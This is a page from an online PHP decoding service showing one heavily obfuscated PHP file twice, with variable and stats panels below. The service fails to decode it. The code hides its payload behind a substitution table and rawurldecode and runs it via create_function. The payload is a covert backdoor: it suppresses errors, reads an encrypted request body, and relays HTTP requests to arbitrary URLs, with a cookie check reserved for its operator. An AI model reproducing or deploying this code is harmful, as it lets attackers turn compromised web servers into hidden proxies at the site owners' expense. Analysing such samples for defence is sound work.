Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $krkgxpdu = 6204; function uzerk($dunvlw, $lbhthiuyv){$epteetppt = ''; for($i=0; $..

Decoded Output download

<?php 
 $krkgxpdu = 6204; function uzerk($dunvlw, $lbhthiuyv){$epteetppt = ''; for($i=0; $i < strlen($dunvlw); $i++){$epteetppt .= isset($lbhthiuyv[$dunvlw[$i]]) ? $lbhthiuyv[$dunvlw[$i]] : $dunvlw[$i];} 
$yxfeekrokw="rawurl" . "decode";return $yxfeekrokw($epteetppt);} 
$wdvzvxqv = '%CIRlR_UAG%Dd%DsqRUpf3k_AyyhyU%Ds%DiI%DK%aN%Iw%IB%CIRlR_UAG%Dd'. 
'%DsfhY_AyyhyU%Ds%DiI%DK%aN%Iw%IB%CIAyyhy_yAphyGRlY%DdI%D'. 
'K%aN%Iw%IB%CIUAG_GRxA_fRxRG%DdI%DK%aN%Iw%IB%CIRYlhyA_SUAy_3QhyG%DdJ%DK%aN%Iw%IB%CIRlR_UAG'. 
'%Dd%Dsx3P_APAeSGRhl_GRxA%Ds%DiI%DK%aN%Iw%IB%Iw%IB4hyA3e5%DI%Dd%DC_iMM9FE%DI3U%DI%D'. 
'CRGAx%DK%Iw%IB%sN%Iw%IB%DI%DI%DI%DIR4%DI%Dd%DCRGAx%'. 
'DI%DJ%aw%DI%DDaJ4daDeq-d0JK-C00q-KsqC-43QedJDJDJQQ%DD%DK%Iw%IB%DI%DI%DI%DI%DI%DI%DI'. 
'%DIAPRG%Dd%DK%aN%Iw%IB%sw%Iw%IB%Iw%IB%DCq3G3%DI%aw%DI4RfA_YAG_ehlGAlGU%Dd%Dsp5p%aB//R'. 
'lpSG%Ds%DK%aN%Iw%IB%DCq3G3%DI%aw%DIUpfRG%Dd%DD%aw%DD%Di%'. 
'DCq3G3%DiD%DK%aN%Iw%IB%Iw%IB%DCQ0C_qAehqA_q3G3%DI%aw%DIQ3UA0C_qAehqA%DdSyfqAehqA%Dd%DCq3G3%bNJ%bw'. 
'%DK%DK%aN%Iw%IB%Iw%IB%DCUAlq_q3G3%DI%aw%DISlUAyR3fRgA%DdqAeykpG%Dd%DCQ0C_qAehqA_q3G3%DK%DK%aN%I'. 
'w%IB%Iw%IB%DCyAUSfG%DI%aw%DIUAlq_q3G3J%DI%Dd%DCUAlq_q3G3%DK%aN%Iw%IB%Iw%IBR4%DI%Dd%DJ%D'. 
'CyAUSfG%DK%Iw%IB%sN%Iw%IB%DI%DI%DI%DI%DCyAUSfG%DI%aw%DIUAlq_q3G3D%Dd%DCUAlq'. 
'_q3G3%DK%aN%Iw%IB%sw%Iw%IB%Iw%IBAe5h%DI%DCyAUSfG%aN%Iw%IB'. 
'%Iw%IB4SleGRhl%DIqAeykpG%Dd%DCq3G3%DK%Iw%IB%sN%Iw%IB%DI%DI%DI%DI%DChSG_q3G'. 
'3%DI%aw%DI%DD%DD%aN%Iw%IB%DI%DI%DI%DI%DC1Ak%DI%aw%DI%DC_VEouEo%bN%DstzzT_tMV'. 
'z%Ds%bw%DI.%DI%DC_VEouEo%bN%DsoEW6EVz_6oF%Ds%bw%aN'. 
'%Iw%IB%DI%DI%DI%DI%DC1Ak_fAl%DI%aw%DIUGyfAl%Dd%DC1Ak%DK%aN%Iw%IB%DI%Iw%IB%DI%DI%DI%DI4hy%DI%Dd%DCR%a'. 
'wI%aN%DI%DCR%DI%ai%DIUGyfAl%Dd%DC1Ak%DK%aN%DI%DCR%DN%DN%DK%Iw%IB%DI%'. 
'DI%DI%DI%sN%Iw%IB%DI%DI%DI%DI%DI%DI%DI%DI%DC1Ak%bN%D'. 
'CR%bw%DI%aw%DIe5y%Ddhyq%Dd%DC1Ak%bN%DCR%bw%DK%DI%bE%DI%Dd%DC1A'. 
'k_fAl%DI%Db%DIDbb%DK%DK%aN%Iw%IB%DI%DI%DI%DI%sw%Iw%IB%Iw%IB'. 
'%DI%DI%DI%DI4hy%DI%Dd%DCR%awI%aN%DI%DCR%aiUGyfAl%Dd%DCq3G3%DK%aN%DK%Iw%IB%DI%DI%DI%DI%sN%Iw%IB%'. 
'DI%DI%DI%DI%DI%DI%DI%DI4hy%DI%Dd%DCX%awI%aN%DI%DCX%aiUGyfAl%Dd%DC1Ak%DK%DI%D'. 
'0%D0%DI%DCR%aiUGyfAl%Dd%DCq3G3%DK%aN%DI%DCX%DN%DN%Di%DI%DCR%DN%DN%DK%Iw%IB%DI%DI%DI%D'. 
'I%DI%DI%DI%DI%sN%Iw%IB%DI%DI%DI%DI%DI%DI%DI%DI%DI%DI%DI%DI%DChSG_q3G3%DI.%aw%DI'. 
'e5y%Ddhyq%Dd%DCq3G3%bN%DCR%bw%DK%DI%bE%DIhyq%Dd%DC1Ak%bN%DCX%bw%DK%DK%aN%Iw%IB%DI%DI%DI%DI%DI%DI%'. 
'DI%DI%sw%Iw%IB%DI%DI%DI%DI%sw%Iw%IB%Iw%IB%DI%DI%DI%DIyAGSyl%DI%DChSG_q3G3%aN%Iw'. 
'%IB%sw%Iw%IB%Iw%IB4SleGRhl%DIUAlq_q3G3J%Dd%DCq3G3%DK%Iw%IB%sN%Iw%IB%DI%DI%DI%DI%DC5A3q%DI%aw%D'. 
'I%DD%DD%aN%Iw%IB%Iw%IB%DI%DI%DI%DI4hyA3e5%Dd%DCq3G3%bN%DD5A3q'. 
'AyU%DD%bw%DI3U%DI%DC1Ak%aw%aE%DCn3fSA%DK%Iw%IB%DI%DI%DI%DI%sN%I'. 
'w%IB%DI%DI%DI%DI%DI%DI%DI%DI%DC5A3q%DI.%aw%DI%DC1Ak%DI.%DI%DD%aB%D'. 
'I%DD%DI.%DI%DCn3fSA%DI.%DI%DD%biy%bil%DD%aN%Iw%IB%DI%DI%DI%DI%sw%Iw%IB%Iw%IB%DI%DI%DI%DI%DCp'. 
'3y3xU%DI%aw%DI3yy3k%Dd%Ds5GGp%Ds%DI%aw%aE%DI3yy3k%Dd%Iw%IB%DI%DI%DI%DI%DI%DI%D'. 
'I%DI%DsxAG5hq%Ds%DI%aw%aE%DI%DCq3G3%bN%DDxAG5hq%DD%bw%Di%Iw%IB%DI%DI%DI%DI%DI%DI%DI%DI%'. 
'Ds5A3qAy%Ds%DI%aw%aE%DI%DC5A3q%Di%Iw%IB%DI%DI%DI%DI%'. 
'DI%DI%DI%DI%DsehlGAlG%Ds%DI%aw%aE%DI%DCq3G3%bN%DDQhqk%DD%bw%Di%Iw%IB%DI%DI%DI%DI%DI%DI%DI'. 
'%DI%DsGRxAhSG%Ds%DI%aw%aE%DI%DCq3G3%bN%DDGRxAhSG%DD%bw%Di%Iw%IB%DI%DI%DI%DI%DI%DI%DI%DI%Iw'. 
'%IB%DI%DI%DI%DI%DK%DK%aN%Iw%IB%Iw%IB%DI%DI%DI%DI%DCeGP%DI%aw%DIUGyA3x_ehlGAPG_eyA3GA%Dd%D'. 
'Cp3y3xU%DK%aN%Iw%IB%DI%DI%DI%DI%Iw%IB%DI%DI%DI%DI%DCyAUSfG%DI%aw%DI%CI4RfA_YAG_eh'. 
'lGAlGU%Dd%DCq3G3%bN%DDSyf%DD%bw%Di%DIcB8VE%Di%DI%DCeGP%DK%aN%Iw%IB%Iw%IB%DI%DI%DI%DIR4%DI%Dd%DC5GGp_'. 
'yAUphlUA_5A3qAy%DK%Iw%IB%DI%DI%DI%DI%sN%Iw%IB%DI%DI%DI%DI%DI%DI%DI%DIR4%'. 
'DI%DdUGyphU%Dd%DC5GGp_yAUphlUA_5A3qAy%bNI%bw%Di%DI%DDDII%DD%DK%DI%aw%aw%a'. 
'w%DIcB8VE%DK%Iw%IB%DI%DI%DI%DI%DI%DI%DI%DI%sN%Iw%IB%DI%DI%DI%DI%DI%DI%DI%DI%DI%DI%DI%DI%D'. 
'CyAUSfG%DI%aw%DI%DDtzzT_EooMo%biG%DD%DI.%DI%DC5GGp_yAUphlUA_'. 
'5A3qAy%bNI%bw%aN%Iw%IB%DI%DI%DI%DI%DI%DI%DI%DI%sw%Iw%IB%DI%DI%DI%DI%s'. 
'w%Iw%IB%DI%DI%DI%DIAfUA%Iw%IB%DI%DI%DI%DI%sN%Iw%IB%DI%DI%DI%DI%DI%DI%DI%DI%DCyAUSfG%D'. 
'I%aw%DI%DDiMHHEizFMH_EooMo%DD%aN%Iw%IB%DI%DI%DI%DI%sw%Iw%IB%Iw%IB%DI%DI%DI%DIyAGSyl%DI'. 
'%DCyAUSfG%aN%Iw%IB%sw%Iw%IB%Iw%IB4SleGRhl%DIUAlq_q3G3D%Dd%DCq3G3%DK%Iw%IB%sN%Iw%IB%DI%DI%DI%DI/'. 
'/%DISUA%DIUhe1AGU%Iw%IB%sw'; 
$ulatnsm = Array('1'=>'k', '0'=>'6', '3'=>'a', '2'=>'X', '5'=>'h', '4'=>'f', '7'=>'J', '6'=>'U', '9'=>'K', '8'=>'L', 'A'=>'e', 'C'=>'4', 'B'=>'A', 'E'=>'E', 'D'=>'2', 'G'=>'t', 'F'=>'I', 'I'=>'0', 'H'=>'N', 'K'=>'9', 'J'=>'1', 'M'=>'O', 'L'=>'M', 'O'=>'Z', 'N'=>'B', 'Q'=>'b', 'P'=>'x', 'S'=>'u', 'R'=>'i', 'U'=>'s', 'T'=>'P', 'W'=>'Q', 'V'=>'S', 'Y'=>'g', 'X'=>'j', 'Z'=>'w', 'a'=>'3', 'c'=>'F', 'b'=>'5', 'e'=>'c', 'd'=>'8', 'g'=>'z', 'f'=>'l', 'i'=>'C', 'h'=>'o', 'k'=>'y', 'j'=>'G', 'm'=>'W', 'l'=>'n', 'o'=>'R', 'n'=>'v', 'q'=>'d', 'p'=>'p', 's'=>'7', 'r'=>'Y', 'u'=>'V', 't'=>'H', 'w'=>'D', 'v'=>'q', 'y'=>'r', 'x'=>'m', 'z'=>'T'); 
$wdvzvxqv=uzerk($wdvzvxqv, $ulatnsm);$ofsnj=chr(470-371)."r"."e".chr(97)."t"."e"."_"."f"."u"."n".chr(99)."t".'i'."o".chr(968-858);$ofsnj('', chr(125) . $wdvzvxqv . chr(123));?>

Did this file decode correctly?

Original Code

<?php
 $krkgxpdu = 6204; function uzerk($dunvlw, $lbhthiuyv){$epteetppt = ''; for($i=0; $i < strlen($dunvlw); $i++){$epteetppt .= isset($lbhthiuyv[$dunvlw[$i]]) ? $lbhthiuyv[$dunvlw[$i]] : $dunvlw[$i];}
$yxfeekrokw="rawurl" . "decode";return $yxfeekrokw($epteetppt);}
$wdvzvxqv = '%CIRlR_UAG%Dd%DsqRUpf3k_AyyhyU%Ds%DiI%DK%aN%Iw%IB%CIRlR_UAG%Dd'.
'%DsfhY_AyyhyU%Ds%DiI%DK%aN%Iw%IB%CIAyyhy_yAphyGRlY%DdI%D'.
'K%aN%Iw%IB%CIUAG_GRxA_fRxRG%DdI%DK%aN%Iw%IB%CIRYlhyA_SUAy_3QhyG%DdJ%DK%aN%Iw%IB%CIRlR_UAG'.
'%Dd%Dsx3P_APAeSGRhl_GRxA%Ds%DiI%DK%aN%Iw%IB%Iw%IB4hyA3e5%DI%Dd%DC_iMM9FE%DI3U%DI%D'.
'CRGAx%DK%Iw%IB%sN%Iw%IB%DI%DI%DI%DIR4%DI%Dd%DCRGAx%'.
'DI%DJ%aw%DI%DDaJ4daDeq-d0JK-C00q-KsqC-43QedJDJDJQQ%DD%DK%Iw%IB%DI%DI%DI%DI%DI%DI%DI'.
'%DIAPRG%Dd%DK%aN%Iw%IB%sw%Iw%IB%Iw%IB%DCq3G3%DI%aw%DI4RfA_YAG_ehlGAlGU%Dd%Dsp5p%aB//R'.
'lpSG%Ds%DK%aN%Iw%IB%DCq3G3%DI%aw%DIUpfRG%Dd%DD%aw%DD%Di%'.
'DCq3G3%DiD%DK%aN%Iw%IB%Iw%IB%DCQ0C_qAehqA_q3G3%DI%aw%DIQ3UA0C_qAehqA%DdSyfqAehqA%Dd%DCq3G3%bNJ%bw'.
'%DK%DK%aN%Iw%IB%Iw%IB%DCUAlq_q3G3%DI%aw%DISlUAyR3fRgA%DdqAeykpG%Dd%DCQ0C_qAehqA_q3G3%DK%DK%aN%I'.
'w%IB%Iw%IB%DCyAUSfG%DI%aw%DIUAlq_q3G3J%DI%Dd%DCUAlq_q3G3%DK%aN%Iw%IB%Iw%IBR4%DI%Dd%DJ%D'.
'CyAUSfG%DK%Iw%IB%sN%Iw%IB%DI%DI%DI%DI%DCyAUSfG%DI%aw%DIUAlq_q3G3D%Dd%DCUAlq'.
'_q3G3%DK%aN%Iw%IB%sw%Iw%IB%Iw%IBAe5h%DI%DCyAUSfG%aN%Iw%IB'.
'%Iw%IB4SleGRhl%DIqAeykpG%Dd%DCq3G3%DK%Iw%IB%sN%Iw%IB%DI%DI%DI%DI%DChSG_q3G'.
'3%DI%aw%DI%DD%DD%aN%Iw%IB%DI%DI%DI%DI%DC1Ak%DI%aw%DI%DC_VEouEo%bN%DstzzT_tMV'.
'z%Ds%bw%DI.%DI%DC_VEouEo%bN%DsoEW6EVz_6oF%Ds%bw%aN'.
'%Iw%IB%DI%DI%DI%DI%DC1Ak_fAl%DI%aw%DIUGyfAl%Dd%DC1Ak%DK%aN%Iw%IB%DI%Iw%IB%DI%DI%DI%DI4hy%DI%Dd%DCR%a'.
'wI%aN%DI%DCR%DI%ai%DIUGyfAl%Dd%DC1Ak%DK%aN%DI%DCR%DN%DN%DK%Iw%IB%DI%'.
'DI%DI%DI%sN%Iw%IB%DI%DI%DI%DI%DI%DI%DI%DI%DC1Ak%bN%D'.
'CR%bw%DI%aw%DIe5y%Ddhyq%Dd%DC1Ak%bN%DCR%bw%DK%DI%bE%DI%Dd%DC1A'.
'k_fAl%DI%Db%DIDbb%DK%DK%aN%Iw%IB%DI%DI%DI%DI%sw%Iw%IB%Iw%IB'.
'%DI%DI%DI%DI4hy%DI%Dd%DCR%awI%aN%DI%DCR%aiUGyfAl%Dd%DCq3G3%DK%aN%DK%Iw%IB%DI%DI%DI%DI%sN%Iw%IB%'.
'DI%DI%DI%DI%DI%DI%DI%DI4hy%DI%Dd%DCX%awI%aN%DI%DCX%aiUGyfAl%Dd%DC1Ak%DK%DI%D'.
'0%D0%DI%DCR%aiUGyfAl%Dd%DCq3G3%DK%aN%DI%DCX%DN%DN%Di%DI%DCR%DN%DN%DK%Iw%IB%DI%DI%DI%D'.
'I%DI%DI%DI%DI%sN%Iw%IB%DI%DI%DI%DI%DI%DI%DI%DI%DI%DI%DI%DI%DChSG_q3G3%DI.%aw%DI'.
'e5y%Ddhyq%Dd%DCq3G3%bN%DCR%bw%DK%DI%bE%DIhyq%Dd%DC1Ak%bN%DCX%bw%DK%DK%aN%Iw%IB%DI%DI%DI%DI%DI%DI%'.
'DI%DI%sw%Iw%IB%DI%DI%DI%DI%sw%Iw%IB%Iw%IB%DI%DI%DI%DIyAGSyl%DI%DChSG_q3G3%aN%Iw'.
'%IB%sw%Iw%IB%Iw%IB4SleGRhl%DIUAlq_q3G3J%Dd%DCq3G3%DK%Iw%IB%sN%Iw%IB%DI%DI%DI%DI%DC5A3q%DI%aw%D'.
'I%DD%DD%aN%Iw%IB%Iw%IB%DI%DI%DI%DI4hyA3e5%Dd%DCq3G3%bN%DD5A3q'.
'AyU%DD%bw%DI3U%DI%DC1Ak%aw%aE%DCn3fSA%DK%Iw%IB%DI%DI%DI%DI%sN%I'.
'w%IB%DI%DI%DI%DI%DI%DI%DI%DI%DC5A3q%DI.%aw%DI%DC1Ak%DI.%DI%DD%aB%D'.
'I%DD%DI.%DI%DCn3fSA%DI.%DI%DD%biy%bil%DD%aN%Iw%IB%DI%DI%DI%DI%sw%Iw%IB%Iw%IB%DI%DI%DI%DI%DCp'.
'3y3xU%DI%aw%DI3yy3k%Dd%Ds5GGp%Ds%DI%aw%aE%DI3yy3k%Dd%Iw%IB%DI%DI%DI%DI%DI%DI%D'.
'I%DI%DsxAG5hq%Ds%DI%aw%aE%DI%DCq3G3%bN%DDxAG5hq%DD%bw%Di%Iw%IB%DI%DI%DI%DI%DI%DI%DI%DI%'.
'Ds5A3qAy%Ds%DI%aw%aE%DI%DC5A3q%Di%Iw%IB%DI%DI%DI%DI%'.
'DI%DI%DI%DI%DsehlGAlG%Ds%DI%aw%aE%DI%DCq3G3%bN%DDQhqk%DD%bw%Di%Iw%IB%DI%DI%DI%DI%DI%DI%DI'.
'%DI%DsGRxAhSG%Ds%DI%aw%aE%DI%DCq3G3%bN%DDGRxAhSG%DD%bw%Di%Iw%IB%DI%DI%DI%DI%DI%DI%DI%DI%Iw'.
'%IB%DI%DI%DI%DI%DK%DK%aN%Iw%IB%Iw%IB%DI%DI%DI%DI%DCeGP%DI%aw%DIUGyA3x_ehlGAPG_eyA3GA%Dd%D'.
'Cp3y3xU%DK%aN%Iw%IB%DI%DI%DI%DI%Iw%IB%DI%DI%DI%DI%DCyAUSfG%DI%aw%DI%CI4RfA_YAG_eh'.
'lGAlGU%Dd%DCq3G3%bN%DDSyf%DD%bw%Di%DIcB8VE%Di%DI%DCeGP%DK%aN%Iw%IB%Iw%IB%DI%DI%DI%DIR4%DI%Dd%DC5GGp_'.
'yAUphlUA_5A3qAy%DK%Iw%IB%DI%DI%DI%DI%sN%Iw%IB%DI%DI%DI%DI%DI%DI%DI%DIR4%'.
'DI%DdUGyphU%Dd%DC5GGp_yAUphlUA_5A3qAy%bNI%bw%Di%DI%DDDII%DD%DK%DI%aw%aw%a'.
'w%DIcB8VE%DK%Iw%IB%DI%DI%DI%DI%DI%DI%DI%DI%sN%Iw%IB%DI%DI%DI%DI%DI%DI%DI%DI%DI%DI%DI%DI%D'.
'CyAUSfG%DI%aw%DI%DDtzzT_EooMo%biG%DD%DI.%DI%DC5GGp_yAUphlUA_'.
'5A3qAy%bNI%bw%aN%Iw%IB%DI%DI%DI%DI%DI%DI%DI%DI%sw%Iw%IB%DI%DI%DI%DI%s'.
'w%Iw%IB%DI%DI%DI%DIAfUA%Iw%IB%DI%DI%DI%DI%sN%Iw%IB%DI%DI%DI%DI%DI%DI%DI%DI%DCyAUSfG%D'.
'I%aw%DI%DDiMHHEizFMH_EooMo%DD%aN%Iw%IB%DI%DI%DI%DI%sw%Iw%IB%Iw%IB%DI%DI%DI%DIyAGSyl%DI'.
'%DCyAUSfG%aN%Iw%IB%sw%Iw%IB%Iw%IB4SleGRhl%DIUAlq_q3G3D%Dd%DCq3G3%DK%Iw%IB%sN%Iw%IB%DI%DI%DI%DI/'.
'/%DISUA%DIUhe1AGU%Iw%IB%sw';
$ulatnsm = Array('1'=>'k', '0'=>'6', '3'=>'a', '2'=>'X', '5'=>'h', '4'=>'f', '7'=>'J', '6'=>'U', '9'=>'K', '8'=>'L', 'A'=>'e', 'C'=>'4', 'B'=>'A', 'E'=>'E', 'D'=>'2', 'G'=>'t', 'F'=>'I', 'I'=>'0', 'H'=>'N', 'K'=>'9', 'J'=>'1', 'M'=>'O', 'L'=>'M', 'O'=>'Z', 'N'=>'B', 'Q'=>'b', 'P'=>'x', 'S'=>'u', 'R'=>'i', 'U'=>'s', 'T'=>'P', 'W'=>'Q', 'V'=>'S', 'Y'=>'g', 'X'=>'j', 'Z'=>'w', 'a'=>'3', 'c'=>'F', 'b'=>'5', 'e'=>'c', 'd'=>'8', 'g'=>'z', 'f'=>'l', 'i'=>'C', 'h'=>'o', 'k'=>'y', 'j'=>'G', 'm'=>'W', 'l'=>'n', 'o'=>'R', 'n'=>'v', 'q'=>'d', 'p'=>'p', 's'=>'7', 'r'=>'Y', 'u'=>'V', 't'=>'H', 'w'=>'D', 'v'=>'q', 'y'=>'r', 'x'=>'m', 'z'=>'T');
$wdvzvxqv=uzerk($wdvzvxqv, $ulatnsm);$ofsnj=chr(470-371)."\x72"."\x65".chr(97)."\164"."\145"."\x5f"."\146"."\165"."\x6e".chr(99)."\164".'i'."\x6f".chr(968-858);$ofsnj('', chr(125) . $wdvzvxqv . chr(123));?>

Function Calls

uzerk 1
strlen 1

Variables

$i 0
$dunvlw %CIRlR_UAG%Dd%DsqRUpf3k_AyyhyU%Ds%DiI%DK%aN%Iw%IB%CIRlR_UAG%..
$ulatnsm [{'key': '1', 'value': 'k'}, {'key': '0', 'value': '6'}, {'key': '3', 'value': 'a'}, {'key': '2', 'value': 'X'}, {'key': '5', 'value': 'h'}, {'key': '4', 'value': 'f'}, {'key': '7', 'value': 'J'}, {'key': '6', 'value': 'U'}, {'key': '9', 'value': 'K'}, {'key': '8', 'value': 'L'}, {'key': 'A', 'value': 'e'}, {'key': 'C', 'value': '4'}, {'key': 'B', 'value': 'A'}, {'key': 'E', 'value': 'E'}, {'key': 'D', 'value': '2'}, {'key': 'G', 'value': 't'}, {'key': 'F', 'value': 'I'}, {'key': 'I', 'value': '0'}, {'key': 'H', 'value': 'N'}, {'key': 'K', 'value': '9'}, {'key': 'J', 'value': '1'}, {'key': 'M', 'value': 'O'}, {'key': 'L', 'value': 'M'}, {'key': 'O', 'value': 'Z'}, {'key': 'N', 'value': 'B'}, {'key': 'Q', 'value': 'b'}, {'key': 'P', 'value': 'x'}, {'key': 'S', 'value': 'u'}, {'key': 'R', 'value': 'i'}, {'key': 'U', 'value': 's'}, {'key': 'T', 'value': 'P'}, {'key': 'W', 'value': 'Q'}, {'key': 'V', 'value': 'S'}, {'key': 'Y', 'value': 'g'}, {'key': 'X', 'value': 'j'}, {'key': 'Z', 'value': 'w'}, {'key': 'a', 'value': '3'}, {'key': 'c', 'value': 'F'}, {'key': 'b', 'value': '5'}, {'key': 'e', 'value': 'c'}, {'key': 'd', 'value': '8'}, {'key': 'g', 'value': 'z'}, {'key': 'f', 'value': 'l'}, {'key': 'i', 'value': 'C'}, {'key': 'h', 'value': 'o'}, {'key': 'k', 'value': 'y'}, {'key': 'j', 'value': 'G'}, {'key': 'm', 'value': 'W'}, {'key': 'l', 'value': 'n'}, {'key': 'o', 'value': 'R'}, {'key': 'n', 'value': 'v'}, {'key': 'q', 'value': 'd'}, {'key': 'p', 'value': 'p'}, {'key': 's', 'value': '7'}, {'key': 'r', 'value': 'Y'}, {'key': 'u', 'value': 'V'}, {'key': 't', 'value': 'H'}, {'key': 'w', 'value': 'D'}, {'key': 'v', 'value': 'q'}, {'key': 'y', 'value': 'r'}, {'key': 'x', 'value': 'm'}, {'key': 'z', 'value': 'T'}]
$krkgxpdu 6204
$wdvzvxqv %CIRlR_UAG%Dd%DsqRUpf3k_AyyhyU%Ds%DiI%DK%aN%Iw%IB%CIRlR_UAG%..
$epteetppt
$lbhthiuyv [{'key': '1', 'value': 'k'}, {'key': '0', 'value': '6'}, {'key': '3', 'value': 'a'}, {'key': '2', 'value': 'X'}, {'key': '5', 'value': 'h'}, {'key': '4', 'value': 'f'}, {'key': '7', 'value': 'J'}, {'key': '6', 'value': 'U'}, {'key': '9', 'value': 'K'}, {'key': '8', 'value': 'L'}, {'key': 'A', 'value': 'e'}, {'key': 'C', 'value': '4'}, {'key': 'B', 'value': 'A'}, {'key': 'E', 'value': 'E'}, {'key': 'D', 'value': '2'}, {'key': 'G', 'value': 't'}, {'key': 'F', 'value': 'I'}, {'key': 'I', 'value': '0'}, {'key': 'H', 'value': 'N'}, {'key': 'K', 'value': '9'}, {'key': 'J', 'value': '1'}, {'key': 'M', 'value': 'O'}, {'key': 'L', 'value': 'M'}, {'key': 'O', 'value': 'Z'}, {'key': 'N', 'value': 'B'}, {'key': 'Q', 'value': 'b'}, {'key': 'P', 'value': 'x'}, {'key': 'S', 'value': 'u'}, {'key': 'R', 'value': 'i'}, {'key': 'U', 'value': 's'}, {'key': 'T', 'value': 'P'}, {'key': 'W', 'value': 'Q'}, {'key': 'V', 'value': 'S'}, {'key': 'Y', 'value': 'g'}, {'key': 'X', 'value': 'j'}, {'key': 'Z', 'value': 'w'}, {'key': 'a', 'value': '3'}, {'key': 'c', 'value': 'F'}, {'key': 'b', 'value': '5'}, {'key': 'e', 'value': 'c'}, {'key': 'd', 'value': '8'}, {'key': 'g', 'value': 'z'}, {'key': 'f', 'value': 'l'}, {'key': 'i', 'value': 'C'}, {'key': 'h', 'value': 'o'}, {'key': 'k', 'value': 'y'}, {'key': 'j', 'value': 'G'}, {'key': 'm', 'value': 'W'}, {'key': 'l', 'value': 'n'}, {'key': 'o', 'value': 'R'}, {'key': 'n', 'value': 'v'}, {'key': 'q', 'value': 'd'}, {'key': 'p', 'value': 'p'}, {'key': 's', 'value': '7'}, {'key': 'r', 'value': 'Y'}, {'key': 'u', 'value': 'V'}, {'key': 't', 'value': 'H'}, {'key': 'w', 'value': 'D'}, {'key': 'v', 'value': 'q'}, {'key': 'y', 'value': 'r'}, {'key': 'x', 'value': 'm'}, {'key': 'z', 'value': 'T'}]

Stats

MD5 b1cecec8ef54b9fb68cb0e4df5a6b89d
Eval Count 0
Decode Time 121 ms